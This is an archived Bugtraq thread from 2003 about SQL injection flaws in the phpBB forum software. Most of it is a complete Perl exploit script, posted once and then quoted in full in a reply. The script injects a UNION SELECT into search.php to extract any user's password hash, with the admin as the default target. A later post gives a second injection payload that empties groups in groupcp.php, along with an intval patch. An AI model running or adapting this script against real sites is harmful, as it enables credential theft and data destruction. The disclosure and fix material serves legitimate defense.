11126036 2003-12-21 02:00 +0300 /68 rader/ =?koi8-r?Q?=22?=f3sy1 f3sy1=?koi8-r?Q?=22=20?= <f3sy1@mail.ru>
Importerad: 2003-12-21 00:15 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: f3sy1@mail.ru
Mottagare: Bugtraq (import) <30438>
Ärende: phpBB v2.06 search_id sql injection exploit
------------------------------------------------------------
From: =?koi8-r?Q?=22?=f3sy1 f3sy1=?koi8-r?Q?=22=20?= <f3sy1@mail.ru>
To: bugtraq@securityfocus.com
Message-ID: <E1AXq5i-000JG8-00.f3sy1-mail-ru@f7.mail.ru>
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with mysql ver > 4.0
## * work only with post #1
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
(11126036) /=?koi8-r?Q?=22?=f3sy1 f3sy1=?koi8-r?Q?=22=20?= <f3sy1@mail.ru>/
11134552 2003-12-23 12:39 -0500 /99 rader/ Micheal Cottingham <micheal@michealcottingham.com>
Importerad: 2003-12-23 22:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30452>
Ärende: Re: phpBB v2.06 search_id sql injection exploit
------------------------------------------------------------
From: Micheal Cottingham <micheal@michealcottingham.com>
To: bugtraq@securityfocus.com
Message-ID: <3FE87DE2.5060805@michealcottingham.com>
It'd be nice if people would actually check the software site first
for fixes ... http://www.phpbb.com/phpBB/viewtopic.php?t=153818 All
you need to know is there.
International Veneer Co., Inc. wrote:
>----- Original Message -----
>From: "f3sy1 f3sy1" <f3sy1@mail.ru>
>To: <bugtraq@securityfocus.com>
>Sent: Saturday, December 20, 2003 6:00 PM
>Subject: phpBB v2.06 search_id sql injection exploit
>
>
>#!/usr/bin/perl -w
>use IO::Socket;
>## PROOF-OF-CONCEPT
>## * work only with mysql ver > 4.0
>## * work only with post #1
>##
>## Example:
>## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
>## [~] prepare to connect...
>## [+] connected
>## [~] prepare to send data...
>## [+] OK
>## [~] wait for response...
>## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
>##
>if (@ARGV < 4)
>{
>print "\n\n";
>print
>"|****************************************************************|\n";
>print " r57phpbb.pl\n";
>print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
>print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
>print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
>print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
>print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
>print " [~] <server> - server ip\n";
>print " [~] <folder> - forum folder\n";
>print " [~] <user_id> - user id (2 default for phpBB admin)\n";
>print " [~] <search_id> - play with this value for results\n";
>print
>"|****************************************************************|\n";
>print "\n\n";
>exit(1);
>}
>$success = 0;
>$server = $ARGV[0];
>$folder = $ARGV[1];
>$user_id = $ARGV[2];
>$search_id = $ARGV[3];
>print "[~] prepare to connect...\n";
>$socket = IO::Socket::INET->new(
>Proto => "tcp",
>PeerAddr => "$server",
>PeerPort => "80") || die "$socket error $!";
>print "[+] connected\n";
>print "[~] prepare to send data...\n";
># PROOF-OF-CONCEPT reguest...
>print $socket "GET
>/$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,5
>8,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,
>116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108
>,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,
>58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105
>,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,1
>15,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,
>95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,11
>5,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,1
>12,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,
>114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_i
>d=$user_id/* HTTP/1.0\r\n\r\n";
>print "[+] OK\n";
>print "[~] wait for response...\n";
>while ($answer = <$socket>)
>{
>if ($answer =~ /;highlight=/)
>{
>$success = 1;
>@result=split(/;/,$answer);
>@result2=split(/=/,$result[1]);
>$result2[1]=~s/&/ /g;
>print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
>}
>}
>if ($success==0) {print "[-] exploit failed =(\n";}
>## o---[ RusH security team | www.rsteam.ru | 2003 ]---o
>
>
>
>
(11134552) /Micheal Cottingham <micheal@michealcottingham.com>/(Ombruten)
11148687 2003-12-29 14:08 +0000 /57 rader/ Jay Gates <zarath@knightsofchaos.com>
Importerad: 2003-12-29 23:03 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <30474>
Ärende: SQL Injection in phpBB's groupcp.php
------------------------------------------------------------
From: Jay Gates <zarath@knightsofchaos.com>
To: bugtraq@securityfocus.com
Message-ID: <20031229140837.22540.qmail@sf-www2-symnsj.securityfocus.com>
BugTraq,
I have found an SQL injection vulnerability in phpBB. Hoever, I don't
think this is going to be be a wide spread problem as it will only
work if you are the moderator of a group.
How the SQL injection works:
In groupscp, it uses an array set to delete members from certain
groups. This array set is sent through a quick loop to put all the
values into a variable seperated by , s and then used in an IN check
in the SQL query to delete the members that you've selected. Code:
$members = ( isset($HTTP_POST_VARS['approve']) ||
isset($HTTP_POST_VARS['deny']) ) ? $HTTP_POST_VARS['pending_members']
: $HTTP_POST_VARS['members'];
$sql_in = '';
for($i = 0; $i < count($members); $i++)
{
$sql_in .= ( ( $sql_in != '' ) ? ', ' : '' ) . $members[$i];
}
After this the $sql_in variable is not checked or changed at all, and
this is where I found the SQL injection to be possible... There are
two places this is used, first is through a check on if you're the
moderator of a group, if you are it will run an if IN check on the
array first:
$sql = "SELECT ug.user_id, ug.group_id
FROM " . AUTH_ACCESS_TABLE . " aa, " . USER_GROUP_TABLE . " ug
WHERE ug.user_id IN ($sql_in)
AND aa.group_id = ug.group_id
AND aa.auth_mod = 1
GROUP BY ug.user_id, ug.group_id
ORDER BY ug.user_id, ug.group_id";
From this, it will pull a list of the users in the group and if
they're moderators from being in the group... If they are, it will
remove their securities.
Now the second one becomes more critical, this is after the check on
if moderator:
$sql = "DELETE FROM " . USER_GROUP_TABLE . "
WHERE user_id IN ($sql_in)
AND group_id = $group_id";
Since this again uses an IN check on the unchecked $sql_in, you can easily replace it with something such as $sql_in = 1) or 1=1/*
That would cause, every person in a group to be automatically deleted from it.
To fix this vulnerability, it's fairly simple. Open your groupcp.php
file. Find $sql_in .= ( ( $sql_in != '' ) ? ', ' : '' )
. $members[$i];
and replace it with
$sql_in .= ( ( $sql_in != '' ) ? ', ' : '' ) . intval($members[$i]);
I'm providing no proof of concept code because you can easily check
if you're vulnerable by searching for the first line in your
groupcp.php file.
Thanks,
Zarath
(11148687) /Jay Gates <zarath@knightsofchaos.com>/(Ombruten)